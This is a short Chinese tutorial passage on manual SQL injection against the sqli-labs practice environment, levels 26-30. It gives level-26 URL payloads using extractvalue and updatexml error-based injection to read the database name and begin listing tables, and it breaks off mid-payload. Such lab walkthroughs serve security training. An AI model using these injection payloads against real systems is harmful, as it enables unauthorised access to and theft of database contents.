labssql专题

sqli-labsSQL手工注入第26-30关

第26关 一.查询数据库 http://127.0.0.1/Less-26/?id=11%27%26extractvalue(1,concat(%27~%27,database(),%27~%27))%261=%27 二.查表 http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(ta